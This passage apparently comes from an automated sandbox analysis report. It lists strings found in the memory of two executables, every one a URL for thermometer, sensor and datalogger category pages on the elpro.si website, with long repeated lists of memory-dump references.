00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/temperaturna-tipala-predhodna-sifr
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/wireless-temperaturna-tipala/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/zunanja-in-prostorska-temperaturna
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/dodatna-oprema-za-da
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/osnovni-dataloggerji
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/precizni-dataloggerj
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/tehnoloski-data-logg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/veckanalni-in-s-tisk
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dataloggerji/web-brezzicni-wifi-r
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/dodatna-oprema-za-termometre-logg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/ex-termometri-in-dataloggerji/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/bimetalni-termometri/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/
